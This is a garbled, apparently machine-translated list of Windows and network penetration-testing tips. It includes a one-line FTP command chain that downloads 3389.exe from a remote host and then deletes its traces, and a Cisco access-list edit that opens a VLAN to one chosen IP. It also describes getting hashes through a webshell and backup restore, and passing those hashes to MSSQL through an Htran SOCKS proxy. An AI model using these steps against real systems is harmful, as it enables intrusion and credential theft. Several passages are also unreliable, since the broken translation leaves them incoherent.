Penetration Testing tips

1.The system prompts that the specified handle is invalid.
Almost none of Baidu's searches can solve this problem.
The correct solution method is to get the opposite machine name in address authentication \ 1.1.1.1, such as ADMINPC. Then, CMD
Echo 1.1.1.1 ADMINPC> C: \ windows \ system32 \ drivers \ etc \ hosts
Then you can at it and no longer prompt that the handle is invalid.
Note: in fact, you do not need the Host Name of the opposite party. simply echo a character to replace the host name.
2. ftpOne sentenceDownload
Previously, it was an echo, and ftp-s was inconvenient. Use the following method.
Echo open 10.0.0.1> o & echo user 1> o & echo get 3389.exe> o & echo quit> o & ftp-n-s: o & del/F/Q o
3.OppositeVISTAThe preceding operations are disabled.NTHASH
LMHASH is disabled for high-end systems. LMHASH is inconvenient during the crash process. You can modify the LMHASH according to the following rule, but it takes effect after you change the password, if you do not change the password type when using metadata, LMHASH will not be stored. Metadata is used for targets that are more sensitive than metadata. It is okay to change the password type every day. This method is applicable to non-WCE time.
Capture. Gif (Thumbnail)
 


4.ModifyCisco access listAvoid complicated"Buddha skip"Process
Ssh Login IP, x. x
Login
En
IPE_CISCO # show access-list
IPE_CISCO # config
IPE_CISCO # terminal
IPE_CISCO # access-list 103 permit host 10.1.6.66 // allow this IP address to access all servers in VLAN103
IPE_CISCO # int vlan 103.
IPE_CISCO # ip access-group 103 out
IPE_CISCO # exit
5. BKFFile Utilization
In the Webshell environment, the elevation of permission is not allowed. a bkf, Copy Downlaod, And the login machine is restored, and WINPE is used for failover shift and get hash.
Then, go to the "pass" button of your project.
6.Based on the replacement systemHashOfSQLIntrusion
HASH of known object system:
Administrator: zhu: 00000000000000000000000000000000: 4A59CF37F6xxxxxx
System OS: 2003, SQLSERVER 2008. The hash value exceeds 14 characters. (For example, if the LMHASH parameter is set to 2003, the password is 000000000 or AA3DXXX if it exceeds 14 characters)
Webshell already exists. If the permission is not obtained, a sock5 proxy is used through Htran. The local WCE serves as the destination HASH, and MSSQL is connected using the sock5 proxy, certificate selection NT.
Finished.
7.Note:Command.com
This command has been running for a long time in WIN95 ~ WIN2003 always exists and is ignored. In fact, it can also replace CMD.
8.WhenIpc $Notes"Password Authentication time
Password is: O *"#~) GbU [x
Net use \ 127.0.0.1 "O *\"#~) GbU [x "/u: administrator
"Add \ before begin to solve the problem.